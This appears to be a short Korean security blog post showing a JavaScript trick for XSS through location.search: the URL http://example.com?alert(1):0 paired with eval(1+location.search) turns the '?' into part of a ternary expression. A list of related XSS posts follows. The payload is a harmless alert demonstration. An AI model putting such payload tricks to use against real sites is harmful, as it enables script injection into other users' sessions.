location.search 를 이용해 XSS 할 때 주로쓰는 payload 는 eval(location.search.substr(1)) 처럼 "?" 를 제거한다.
하지만 Javscript 3항 조건부 삼항 연산자를 통해서 "?" 를 제거하지 않고 XSS 를 할 수 있다.
url: http://example.com?alert(1):0
payload: eval(1+location.search)
Script tag Comments (0) | 2019.10.14 |
---|---|
UTF-8 'LINE SEPARATOR' (U+2028) (0) | 2019.10.14 |
Auditor bypass with multi inject XSS (0) | 2019.08.10 |
XSS location (2) | 2019.08.09 |
RegRegExp.prototype.source (0) | 2019.08.09 |